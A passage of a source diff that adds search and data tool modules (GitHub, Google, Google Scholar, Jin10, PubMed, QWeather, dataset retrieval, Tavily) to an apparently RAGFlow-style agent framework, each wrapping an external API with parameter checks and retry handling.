                url = 'https://api.github.com/search/repositories?q=' + kwargs["query"] + '&sort=stars&order=desc&per_page=' + str(
                    self._param.top_n)
                headers = {"Content-Type": "application/vnd.github+json", "X-GitHub-Api-Version": '2022-11-28'}
                response = requests.get(url=url, headers=headers).json()
                self._retrieve_chunks(response['items'],
                                      get_title=lambda r: r["name"],
                                      get_url=lambda r: r["html_url"],
                                      get_content=lambda r: str(r["description"]) + '\n stars:' + str(r['watchers']))
                self.set_output("json", response['items'])
                return self.output("formalized_content")
            except Exception as e:
                last_e = e
                logging.exception(f"GitHub error: {e}")
                time.sleep(self._param.delay_after_error)
        if last_e:
            self.set_output("_ERROR", str(last_e))
            return f"GitHub error: {last_e}"
        assert False, self.output()
    def thoughts(self) -> str:
        return "Scanning GitHub repos related to `{}`.".format(self.get_input().get("query", "-_-!"))
--- a/agent/tools/google.py
+++ b/agent/tools/google.py
@ -0,0 +1,159 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import logging
 import os
 import time
 from abc import ABC
 from serpapi import GoogleSearch
 from agent.tools.base import ToolParamBase, ToolMeta, ToolBase
 from api.utils.api_utils import timeout
 class GoogleParam(ToolParamBase):
    """
    Define the Google component parameters.
    """
    def __init__(self):
        self.meta:ToolMeta = {
            "name": "google_search",
            "description": """Search the world's information, including webpages, images, videos and more. Google has many special features to help you find exactly what you're looking ...""",
            "parameters": {
                "q": {
                    "type": "string",
                    "description": "The search keywords to execute with Google. The keywords should be the most important words/terms(includes synonyms) from the original request.",
                    "default": "{sys.query}",
                    "required": True
                },
                "start": {
                    "type": "integer",
                    "description": "Parameter defines the result offset. It skips the given number of results. It's used for pagination. (e.g., 0 (default) is the first page of results, 10 is the 2nd page of results, 20 is the 3rd page of results, etc.). Google Local Results only accepts multiples of 20(e.g. 20 for the second page results, 40 for the third page results, etc.) as the `start` value.",
                    "default": "0",
                    "required": False,
                },
                "num": {
                    "type": "integer",
                    "description": "Parameter defines the maximum number of results to return. (e.g., 10 (default) returns 10 results, 40 returns 40 results, and 100 returns 100 results). The use of num may introduce latency, and/or prevent the inclusion of specialized result types. It is better to omit this parameter unless it is strictly necessary to increase the number of results per page. Results are not guaranteed to have the number of results specified in num.",
                    "default": "6",
                    "required": False,
                }
            }
        }
        super().__init__()
        self.start = 0
        self.num = 6
        self.api_key = ""
        self.country = "cn"
        self.language = "en"
    def check(self):
        self.check_empty(self.api_key, "SerpApi API key")
        self.check_valid_value(self.country, "Google Country",
                               ['af', 'al', 'dz', 'as', 'ad', 'ao', 'ai', 'aq', 'ag', 'ar', 'am', 'aw', 'au', 'at',
                                'az', 'bs', 'bh', 'bd', 'bb', 'by', 'be', 'bz', 'bj', 'bm', 'bt', 'bo', 'ba', 'bw',
                                'bv', 'br', 'io', 'bn', 'bg', 'bf', 'bi', 'kh', 'cm', 'ca', 'cv', 'ky', 'cf', 'td',
                                'cl', 'cn', 'cx', 'cc', 'co', 'km', 'cg', 'cd', 'ck', 'cr', 'ci', 'hr', 'cu', 'cy',
                                'cz', 'dk', 'dj', 'dm', 'do', 'ec', 'eg', 'sv', 'gq', 'er', 'ee', 'et', 'fk', 'fo',
                                'fj', 'fi', 'fr', 'gf', 'pf', 'tf', 'ga', 'gm', 'ge', 'de', 'gh', 'gi', 'gr', 'gl',
                                'gd', 'gp', 'gu', 'gt', 'gn', 'gw', 'gy', 'ht', 'hm', 'va', 'hn', 'hk', 'hu', 'is',
                                'in', 'id', 'ir', 'iq', 'ie', 'il', 'it', 'jm', 'jp', 'jo', 'kz', 'ke', 'ki', 'kp',
                                'kr', 'kw', 'kg', 'la', 'lv', 'lb', 'ls', 'lr', 'ly', 'li', 'lt', 'lu', 'mo', 'mk',
                                'mg', 'mw', 'my', 'mv', 'ml', 'mt', 'mh', 'mq', 'mr', 'mu', 'yt', 'mx', 'fm', 'md',
                                'mc', 'mn', 'ms', 'ma', 'mz', 'mm', 'na', 'nr', 'np', 'nl', 'an', 'nc', 'nz', 'ni',
                                'ne', 'ng', 'nu', 'nf', 'mp', 'no', 'om', 'pk', 'pw', 'ps', 'pa', 'pg', 'py', 'pe',
                                'ph', 'pn', 'pl', 'pt', 'pr', 'qa', 're', 'ro', 'ru', 'rw', 'sh', 'kn', 'lc', 'pm',
                                'vc', 'ws', 'sm', 'st', 'sa', 'sn', 'rs', 'sc', 'sl', 'sg', 'sk', 'si', 'sb', 'so',
                                'za', 'gs', 'es', 'lk', 'sd', 'sr', 'sj', 'sz', 'se', 'ch', 'sy', 'tw', 'tj', 'tz',
                                'th', 'tl', 'tg', 'tk', 'to', 'tt', 'tn', 'tr', 'tm', 'tc', 'tv', 'ug', 'ua', 'ae',
                                'uk', 'gb', 'us', 'um', 'uy', 'uz', 'vu', 've', 'vn', 'vg', 'vi', 'wf', 'eh', 'ye',
                                'zm', 'zw'])
        self.check_valid_value(self.language, "Google languages",
                               ['af', 'ak', 'sq', 'ws', 'am', 'ar', 'hy', 'az', 'eu', 'be', 'bem', 'bn', 'bh',
                                'xx-bork', 'bs', 'br', 'bg', 'bt', 'km', 'ca', 'chr', 'ny', 'zh-cn', 'zh-tw', 'co',
                                'hr', 'cs', 'da', 'nl', 'xx-elmer', 'en', 'eo', 'et', 'ee', 'fo', 'tl', 'fi', 'fr',
                                'fy', 'gaa', 'gl', 'ka', 'de', 'el', 'kl', 'gn', 'gu', 'xx-hacker', 'ht', 'ha', 'haw',
                                'iw', 'hi', 'hu', 'is', 'ig', 'id', 'ia', 'ga', 'it', 'ja', 'jw', 'kn', 'kk', 'rw',
                                'rn', 'xx-klingon', 'kg', 'ko', 'kri', 'ku', 'ckb', 'ky', 'lo', 'la', 'lv', 'ln', 'lt',
                                'loz', 'lg', 'ach', 'mk', 'mg', 'ms', 'ml', 'mt', 'mv', 'mi', 'mr', 'mfe', 'mo', 'mn',
                                'sr-me', 'my', 'ne', 'pcm', 'nso', 'no', 'nn', 'oc', 'or', 'om', 'ps', 'fa',
                                'xx-pirate', 'pl', 'pt', 'pt-br', 'pt-pt', 'pa', 'qu', 'ro', 'rm', 'nyn', 'ru', 'gd',
                                'sr', 'sh', 'st', 'tn', 'crs', 'sn', 'sd', 'si', 'sk', 'sl', 'so', 'es', 'es-419', 'su',
                                'sw', 'sv', 'tg', 'ta', 'tt', 'te', 'th', 'ti', 'to', 'lua', 'tum', 'tr', 'tk', 'tw',
                                'ug', 'uk', 'ur', 'uz', 'vu', 'vi', 'cy', 'wo', 'xh', 'yi', 'yo', 'zu']
                               )
    def get_input_form(self) -> dict[str, dict]:
        return {
            "q": {
                "name": "Query",
                "type": "line"
            },
            "start": {
                "name": "From",
                "type": "integer",
                "value": 0
            },
            "num": {
                "name": "Limit",
                "type": "integer",
                "value": 12
            }
        }
 class Google(ToolBase, ABC):
    component_name = "Google"
    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 12))
    def _invoke(self, **kwargs):
        if not kwargs.get("q"):
            self.set_output("formalized_content", "")
            return ""
        params = {
            "api_key": self._param.api_key,
            "engine": "google",
            "q": kwargs["q"],
            "google_domain": "google.com",
            "gl": self._param.country,
            "hl": self._param.language
        }
        last_e = ""
        for _ in range(self._param.max_retries+1):
            try:
                search = GoogleSearch(params).get_dict()
                self._retrieve_chunks(search["organic_results"],
                                      get_title=lambda r: r["title"],
                                      get_url=lambda r: r["link"],
                                      get_content=lambda r: r.get("about_this_result", {}).get("source", {}).get("description", r["snippet"])
                                      )
                self.set_output("json", search["organic_results"])
                return self.output("formalized_content")
            except Exception as e:
                last_e = e
                logging.exception(f"Google error: {e}")
                time.sleep(self._param.delay_after_error)
        if last_e:
            self.set_output("_ERROR", str(last_e))
            return f"Google error: {last_e}"
        assert False, self.output()
    def thoughts(self) -> str:
        return """
 Keywords: {} 
 Looking for the most relevant articles.
        """.format(self.get_input().get("query", "-_-!"))
--- a/agent/tools/googlescholar.py
+++ b/agent/tools/googlescholar.py
@ -0,0 +1,96 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import logging
 import os
 import time
 from abc import ABC
 from scholarly import scholarly
 from agent.tools.base import ToolMeta, ToolParamBase, ToolBase
 from api.utils.api_utils import timeout
 class GoogleScholarParam(ToolParamBase):
    """
    Define the GoogleScholar component parameters.
    """
    def __init__(self):
        self.meta:ToolMeta = {
            "name": "google_scholar_search",
            "description": """Google Scholar provides a simple way to broadly search for scholarly literature. From one place, you can search across many disciplines and sources: articles, theses, books, abstracts and court opinions, from academic publishers, professional societies, online repositories, universities and other web sites. Google Scholar helps you find relevant work across the world of scholarly research.""",
            "parameters": {
                "query": {
                    "type": "string",
                    "description": "The search keyword to execute with Google Scholar. The keywords should be the most important words/terms(includes synonyms) from the original request.",
                    "default": "{sys.query}",
                    "required": True
                }
            }
        }
        super().__init__()
        self.top_n = 12
        self.sort_by = 'relevance'
        self.year_low = None
        self.year_high = None
        self.patents = True
    def check(self):
        self.check_positive_integer(self.top_n, "Top N")
        self.check_valid_value(self.sort_by, "GoogleScholar Sort_by", ['date', 'relevance'])
        self.check_boolean(self.patents, "Whether or not to include patents, defaults to True")
    def get_input_form(self) -> dict[str, dict]:
        return {
            "query": {
                "name": "Query",
                "type": "line"
            }
        }
 class GoogleScholar(ToolBase, ABC):
    component_name = "GoogleScholar"
    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 12))
    def _invoke(self, **kwargs):
        if not kwargs.get("query"):
            self.set_output("formalized_content", "")
            return ""
        last_e = ""
        for _ in range(self._param.max_retries+1):
            try:
                scholar_client = scholarly.search_pubs(kwargs["query"], patents=self._param.patents, year_low=self._param.year_low,
                                                       year_high=self._param.year_high, sort_by=self._param.sort_by)
                self._retrieve_chunks(scholar_client,
                                      get_title=lambda r: r['bib']['title'],
                                      get_url=lambda r: r["pub_url"],
                                      get_content=lambda r: "\n author: " + ",".join(r['bib']['author']) + '\n Abstract: ' + r['bib'].get('abstract', 'no abstract')
                                      )
                self.set_output("json", list(scholar_client))
                return self.output("formalized_content")
            except Exception as e:
                last_e = e
                logging.exception(f"GoogleScholar error: {e}")
                time.sleep(self._param.delay_after_error)
        if last_e:
            self.set_output("_ERROR", str(last_e))
            return f"GoogleScholar error: {last_e}"
        assert False, self.output()
    def thoughts(self) -> str:
        return "Looking for scholarly papers on `{}`,” prioritising reputable sources.".format(self.get_input().get("query", "-_-!"))
--- a/agent/tools/jin10.py
+++ b/agent/tools/jin10.py
@ -0,0 +1,130 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import json
 from abc import ABC
 import pandas as pd
 import requests
 from agent.component.base import ComponentBase, ComponentParamBase
 class Jin10Param(ComponentParamBase):
    """
    Define the Jin10 component parameters.
    """
    def __init__(self):
        super().__init__()
        self.type = "flash"
        self.secret_key = "xxx"
        self.flash_type = '1'
        self.calendar_type = 'cj'
        self.calendar_datatype = 'data'
        self.symbols_type = 'GOODS'
        self.symbols_datatype = 'symbols'
        self.contain = ""
        self.filter = ""
    def check(self):
        self.check_valid_value(self.type, "Type", ['flash', 'calendar', 'symbols', 'news'])
        self.check_valid_value(self.flash_type, "Flash Type", ['1', '2', '3', '4', '5'])
        self.check_valid_value(self.calendar_type, "Calendar Type", ['cj', 'qh', 'hk', 'us'])
        self.check_valid_value(self.calendar_datatype, "Calendar DataType", ['data', 'event', 'holiday'])
        self.check_valid_value(self.symbols_type, "Symbols Type", ['GOODS', 'FOREX', 'FUTURE', 'CRYPTO'])
        self.check_valid_value(self.symbols_datatype, 'Symbols DataType', ['symbols', 'quotes'])
 class Jin10(ComponentBase, ABC):
    component_name = "Jin10"
    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = " - ".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return Jin10.be_output("")
        jin10_res = []
        headers = {'secret-key': self._param.secret_key}
        try:
            if self._param.type == "flash":
                params = {
                    'category': self._param.flash_type,
                    'contain': self._param.contain,
                    'filter': self._param.filter
                }
                response = requests.get(
                    url='https://open-data-api.jin10.com/data-api/flash?category=' + self._param.flash_type,
                    headers=headers, data=json.dumps(params))
                response = response.json()
                for i in response['data']:
                    jin10_res.append({"content": i['data']['content']})
            if self._param.type == "calendar":
                params = {
                    'category': self._param.calendar_type
                }
                response = requests.get(
                    url='https://open-data-api.jin10.com/data-api/calendar/' + self._param.calendar_datatype + '?category=' + self._param.calendar_type,
                    headers=headers, data=json.dumps(params))
                response = response.json()
                jin10_res.append({"content": pd.DataFrame(response['data']).to_markdown()})
            if self._param.type == "symbols":
                params = {
                    'type': self._param.symbols_type
                }
                if self._param.symbols_datatype == "quotes":
                    params['codes'] = 'BTCUSD'
                response = requests.get(
                    url='https://open-data-api.jin10.com/data-api/' + self._param.symbols_datatype + '?type=' + self._param.symbols_type,
                    headers=headers, data=json.dumps(params))
                response = response.json()
                if self._param.symbols_datatype == "symbols":
                    for i in response['data']:
                        i['Commodity Code'] = i['c']
                        i['Stock Exchange'] = i['e']
                        i['Commodity Name'] = i['n']
                        i['Commodity Type'] = i['t']
                        del i['c'], i['e'], i['n'], i['t']
                if self._param.symbols_datatype == "quotes":
                    for i in response['data']:
                        i['Selling Price'] = i['a']
                        i['Buying Price'] = i['b']
                        i['Commodity Code'] = i['c']
                        i['Stock Exchange'] = i['e']
                        i['Highest Price'] = i['h']
                        i['Yesterday’s Closing Price'] = i['hc']
                        i['Lowest Price'] = i['l']
                        i['Opening Price'] = i['o']
                        i['Latest Price'] = i['p']
                        i['Market Quote Time'] = i['t']
                        del i['a'], i['b'], i['c'], i['e'], i['h'], i['hc'], i['l'], i['o'], i['p'], i['t']
                jin10_res.append({"content": pd.DataFrame(response['data']).to_markdown()})
            if self._param.type == "news":
                params = {
                    'contain': self._param.contain,
                    'filter': self._param.filter
                }
                response = requests.get(
                    url='https://open-data-api.jin10.com/data-api/news',
                    headers=headers, data=json.dumps(params))
                response = response.json()
                jin10_res.append({"content": pd.DataFrame(response['data']).to_markdown()})
        except Exception as e:
            return Jin10.be_output("**ERROR**: " + str(e))
        if not jin10_res:
            return Jin10.be_output("")
        return pd.DataFrame(jin10_res)
--- a/agent/tools/pubmed.py
+++ b/agent/tools/pubmed.py
@ -0,0 +1,108 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import logging
 import os
 import time
 from abc import ABC
 from Bio import Entrez
 import re
 import xml.etree.ElementTree as ET
 from agent.tools.base import ToolParamBase, ToolMeta, ToolBase
 from api.utils.api_utils import timeout
 class PubMedParam(ToolParamBase):
    """
    Define the PubMed component parameters.
    """
    def __init__(self):
        self.meta:ToolMeta = {
            "name": "pubmed_search",
            "description": """
 PubMed is an openly accessible, free database which includes primarily the MEDLINE database of references and abstracts on life sciences and biomedical topics. 
 In addition to MEDLINE, PubMed provides access to:
 - older references from the print version of Index Medicus, back to 1951 and earlier
 - references to some journals before they were indexed in Index Medicus and MEDLINE, for instance Science, BMJ, and Annals of Surgery
 - very recent entries to records for an article before it is indexed with Medical Subject Headings (MeSH) and added to MEDLINE
 - a collection of books available full-text and other subsets of NLM records[4]
 - PMC citations
 - NCBI Bookshelf
            """,
            "parameters": {
                "query": {
                    "type": "string",
                    "description": "The search keywords to execute with PubMed. The keywords should be the most important words/terms(includes synonyms) from the original request.",
                    "default": "{sys.query}",
                    "required": True
                }
            }
        }
        super().__init__()
        self.top_n = 12
        self.email = "A.N.Other@example.com"
    def check(self):
        self.check_positive_integer(self.top_n, "Top N")
    def get_input_form(self) -> dict[str, dict]:
        return {
            "query": {
                "name": "Query",
                "type": "line"
            }
        }
 class PubMed(ToolBase, ABC):
    component_name = "PubMed"
    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 12))
    def _invoke(self, **kwargs):
        if not kwargs.get("query"):
            self.set_output("formalized_content", "")
            return ""
        last_e = ""
        for _ in range(self._param.max_retries+1):
            try:
                Entrez.email = self._param.email
                pubmedids = Entrez.read(Entrez.esearch(db='pubmed', retmax=self._param.top_n, term=kwargs["query"]))['IdList']
                pubmedcnt = ET.fromstring(re.sub(r'<(/?)b>|<(/?)i>', '', Entrez.efetch(db='pubmed', id=",".join(pubmedids),
                                                                                       retmode="xml").read().decode("utf-8")))
                self._retrieve_chunks(pubmedcnt.findall("PubmedArticle"),
                                      get_title=lambda child: child.find("MedlineCitation").find("Article").find("ArticleTitle").text,
                                      get_url=lambda child: "https://pubmed.ncbi.nlm.nih.gov/" + child.find("MedlineCitation").find("PMID").text,
                                      get_content=lambda child: child.find("MedlineCitation") \
                                                                    .find("Article") \
                                                                    .find("Abstract") \
                                                                    .find("AbstractText").text \
                                                                    if child.find("MedlineCitation")\
                                                                            .find("Article").find("Abstract")  \
                                                                    else "No abstract available")
                return self.output("formalized_content")
            except Exception as e:
                last_e = e
                logging.exception(f"PubMed error: {e}")
                time.sleep(self._param.delay_after_error)
        if last_e:
            self.set_output("_ERROR", str(last_e))
            return f"PubMed error: {last_e}"
        assert False, self.output()
    def thoughts(self) -> str:
        return "Looking for scholarly papers on `{}`,” prioritising reputable sources.".format(self.get_input().get("query", "-_-!"))
--- a/agent/tools/qweather.py
+++ b/agent/tools/qweather.py
@ -0,0 +1,111 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 from abc import ABC
 import pandas as pd
 import requests
 from agent.component.base import ComponentBase, ComponentParamBase
 class QWeatherParam(ComponentParamBase):
    """
    Define the QWeather component parameters.
    """
    def __init__(self):
        super().__init__()
        self.web_apikey = "xxx"
        self.lang = "zh"
        self.type = "weather"
        self.user_type = 'free'
        self.error_code = {
            "204": "The request was successful, but the region you are querying does not have the data you need at this time.",
            "400": "Request error, may contain incorrect request parameters or missing mandatory request parameters.",
            "401": "Authentication fails, possibly using the wrong KEY, wrong digital signature, wrong type of KEY (e.g. using the SDK's KEY to access the Web API).",
            "402": "Exceeded the number of accesses or the balance is not enough to support continued access to the service, you can recharge, upgrade the accesses or wait for the accesses to be reset.",
            "403": "No access, may be the binding PackageName, BundleID, domain IP address is inconsistent, or the data that requires additional payment.",
            "404": "The queried data or region does not exist.",
            "429": "Exceeded the limited QPM (number of accesses per minute), please refer to the QPM description",
            "500": "No response or timeout, interface service abnormality please contact us"
            }
        # Weather
        self.time_period = 'now'
    def check(self):
        self.check_empty(self.web_apikey, "BaiduFanyi APPID")
        self.check_valid_value(self.type, "Type", ["weather", "indices", "airquality"])
        self.check_valid_value(self.user_type, "Free subscription or paid subscription", ["free", "paid"])
        self.check_valid_value(self.lang, "Use language",
                               ['zh', 'zh-hant', 'en', 'de', 'es', 'fr', 'it', 'ja', 'ko', 'ru', 'hi', 'th', 'ar', 'pt',
                                'bn', 'ms', 'nl', 'el', 'la', 'sv', 'id', 'pl', 'tr', 'cs', 'et', 'vi', 'fil', 'fi',
                                'he', 'is', 'nb'])
        self.check_valid_value(self.time_period, "Time period", ['now', '3d', '7d', '10d', '15d', '30d'])
 class QWeather(ComponentBase, ABC):
    component_name = "QWeather"
    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = "".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return QWeather.be_output("")
        try:
            response = requests.get(
                url="https://geoapi.qweather.com/v2/city/lookup?location=" + ans + "&key=" + self._param.web_apikey).json()
            if response["code"] == "200":
                location_id = response["location"][0]["id"]
            else:
                return QWeather.be_output("**Error**" + self._param.error_code[response["code"]])
            base_url = "https://api.qweather.com/v7/" if self._param.user_type == 'paid' else "https://devapi.qweather.com/v7/"
            if self._param.type == "weather":
                url = base_url + "weather/" + self._param.time_period + "?location=" + location_id + "&key=" + self._param.web_apikey + "&lang=" + self._param.lang
                response = requests.get(url=url).json()
                if response["code"] == "200":
                    if self._param.time_period == "now":
                        return QWeather.be_output(str(response["now"]))
                    else:
                        qweather_res = [{"content": str(i) + "\n"} for i in response["daily"]]
                        if not qweather_res:
                            return QWeather.be_output("")
                        df = pd.DataFrame(qweather_res)
                        return df
                else:
                    return QWeather.be_output("**Error**" + self._param.error_code[response["code"]])
            elif self._param.type == "indices":
                url = base_url + "indices/1d?type=0&location=" + location_id + "&key=" + self._param.web_apikey + "&lang=" + self._param.lang
                response = requests.get(url=url).json()
                if response["code"] == "200":
                    indices_res = response["daily"][0]["date"] + "\n" + "\n".join(
                        [i["name"] + ": " + i["category"] + ", " + i["text"] for i in response["daily"]])
                    return QWeather.be_output(indices_res)
                else:
                    return QWeather.be_output("**Error**" + self._param.error_code[response["code"]])
            elif self._param.type == "airquality":
                url = base_url + "air/now?location=" + location_id + "&key=" + self._param.web_apikey + "&lang=" + self._param.lang
                response = requests.get(url=url).json()
                if response["code"] == "200":
                    return QWeather.be_output(str(response["now"]))
                else:
                    return QWeather.be_output("**Error**" + self._param.error_code[response["code"]])
        except Exception as e:
            return QWeather.be_output("**Error**" + str(e))
--- a/agent/tools/retrieval.py
+++ b/agent/tools/retrieval.py
@ -0,0 +1,167 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import os
 import re
 from abc import ABC
 from agent.tools.base import ToolParamBase, ToolBase, ToolMeta
 from api.db import LLMType
 from api.db.services.knowledgebase_service import KnowledgebaseService
 from api.db.services.llm_service import LLMBundle
 from api import settings
 from api.utils.api_utils import timeout
 from rag.app.tag import label_question
 from rag.prompts import kb_prompt
 from rag.prompts.prompts import cross_languages
 class RetrievalParam(ToolParamBase):
    """
    Define the Retrieval component parameters.
    """
    def __init__(self):
        self.meta:ToolMeta = {
            "name": "search_my_dateset",
            "description": "This tool can be utilized for relevant content searching in the datasets.",
            "parameters": {
                "query": {
                    "type": "string",
                    "description": "The keywords to search the dataset. The keywords should be the most important words/terms(includes synonyms) from the original request.",
                    "default": "",
                    "required": True
                }
            }
        }
        super().__init__()
        self.function_name = "search_my_dateset"
        self.description = "This tool can be utilized for relevant content searching in the datasets."
        self.similarity_threshold = 0.2
        self.keywords_similarity_weight = 0.5
        self.top_n = 8
        self.top_k = 1024
        self.kb_ids = []
        self.kb_vars = []
        self.rerank_id = ""
        self.empty_response = ""
        self.use_kg = False
        self.cross_languages = []
    def check(self):
        self.check_decimal_float(self.similarity_threshold, "[Retrieval] Similarity threshold")
        self.check_decimal_float(self.keywords_similarity_weight, "[Retrieval] Keyword similarity weight")
        self.check_positive_number(self.top_n, "[Retrieval] Top N")
    def get_input_form(self) -> dict[str, dict]:
        return {
            "query": {
                "name": "Query",
                "type": "line"
            }
        }
 class Retrieval(ToolBase, ABC):
    component_name = "Retrieval"
    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 12))
    def _invoke(self, **kwargs):
        if not kwargs.get("query"):
            self.set_output("formalized_content", self._param.empty_response)
        kb_ids: list[str] = []
        for id in self._param.kb_ids:
            if id.find("@") < 0:
                kb_ids.append(id)
                continue
            kb_nm = self._canvas.get_variable_value(id)
            e, kb = KnowledgebaseService.get_by_name(kb_nm)
            if not e:
                raise Exception(f"Dataset({kb_nm}) does not exist.")
            kb_ids.append(kb.id)
        filtered_kb_ids: list[str] = list(set([kb_id for kb_id in kb_ids if kb_id]))
        kbs = KnowledgebaseService.get_by_ids(filtered_kb_ids)
        if not kbs:
            raise Exception("No dataset is selected.")
        embd_nms = list(set([kb.embd_id for kb in kbs]))
        assert len(embd_nms) == 1, "Knowledge bases use different embedding models."
        embd_mdl = None
        if embd_nms:
            embd_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.EMBEDDING, embd_nms[0])
        rerank_mdl = None
        if self._param.rerank_id:
            rerank_mdl = LLMBundle(kbs[0].tenant_id, LLMType.RERANK, self._param.rerank_id)
        query = kwargs["query"]
        if self._param.cross_languages:
            query = cross_languages(kbs[0].tenant_id, None, query, self._param.cross_languages)
        if kbs:
            query = re.sub(r"^user[:：\s]*", "", query, flags=re.IGNORECASE)
            kbinfos = settings.retrievaler.retrieval(
                query,
                embd_mdl,
                [kb.tenant_id for kb in kbs],
                filtered_kb_ids,
                1,
                self._param.top_n,
                self._param.similarity_threshold,
                1 - self._param.keywords_similarity_weight,
                aggs=False,
                rerank_mdl=rerank_mdl,
                rank_feature=label_question(query, kbs),
            )
            if self._param.use_kg:
                ck = settings.kg_retrievaler.retrieval(query,
                                                       [kb.tenant_id for kb in kbs],
                                                       kb_ids,
                                                       embd_mdl,
                                                       LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT))
                if ck["content_with_weight"]:
                    kbinfos["chunks"].insert(0, ck)
        else:
            kbinfos = {"chunks": [], "doc_aggs": []}
        if self._param.use_kg and kbs:
            ck = settings.kg_retrievaler.retrieval(query, [kb.tenant_id for kb in kbs], filtered_kb_ids, embd_mdl, LLMBundle(kbs[0].tenant_id, LLMType.CHAT))
            if ck["content_with_weight"]:
                ck["content"] = ck["content_with_weight"]
                del ck["content_with_weight"]
                kbinfos["chunks"].insert(0, ck)
        for ck in kbinfos["chunks"]:
            if "vector" in ck:
                del ck["vector"]
            if "content_ltks" in ck:
                del ck["content_ltks"]
        if not kbinfos["chunks"]:
            self.set_output("formalized_content", self._param.empty_response)
            return
        self._canvas.add_refernce(kbinfos["chunks"], kbinfos["doc_aggs"])
        form_cnt = "\n".join(kb_prompt(kbinfos, 200000, True))
        self.set_output("formalized_content", form_cnt)
        return form_cnt
    def thoughts(self) -> str:
        return """
 Keywords: {} 
 Looking for the most relevant articles.
        """.format(self.get_input().get("query", "-_-!"))
--- a/agent/tools/tavily.py
+++ b/agent/tools/tavily.py
@ -0,0 +1,227 @@
 #
 #  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 #  Licensed under the Apache License, Version 2.0 (the "License");
 #  you may not use this file except in compliance with the License.
 #  You may obtain a copy of the License at
 #
 #      http://www.apache.org/licenses/LICENSE-2.0
 #
 #  Unless required by applicable law or agreed to in writing, software
 #  distributed under the License is distributed on an "AS IS" BASIS,
 #  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #  See the License for the specific language governing permissions and
 #  limitations under the License.
 #
 import logging
 import os
 import time
 from abc import ABC
 from tavily import TavilyClient
 from agent.tools.base import ToolParamBase, ToolBase, ToolMeta
 from api.utils.api_utils import timeout
 class TavilySearchParam(ToolParamBase):
    """
    Define the Retrieval component parameters.
    """
    def __init__(self):
        self.meta:ToolMeta = {
            "name": "tavily_search",
            "description": """
 Tavily is a search engine optimized for LLMs, aimed at efficient, quick and persistent search results. 
 When searching:
   - Start with specific query which should focus on just a single aspect.
   - Number of keywords in query should be less than 5.
   - Broaden search terms if needed
   - Cross-reference information from multiple sources
             """,
            "parameters": {
                "query": {
                    "type": "string",
                    "description": "The search keywords to execute with Tavily. The keywords should be the most important words/terms(includes synonyms) from the original request.",
                    "default": "{sys.query}",
                    "required": True
                },
                "topic": {
                    "type": "string",
                    "description": "default:general. The category of the search.news is useful for retrieving real-time updates, particularly about politics, sports, and major current events covered by mainstream media sources. general is for broader, more general-purpose searches that may include a wide range of sources.",
                    "enum": ["general", "news"],
                    "default": "general",
                    "required": False,
                },
                "include_domains": {
                    "type": "array",
                    "description": "default:[]. A list of domains only from which the search results can be included.",
                    "default": [],
                    "items": {
                        "type": "string",
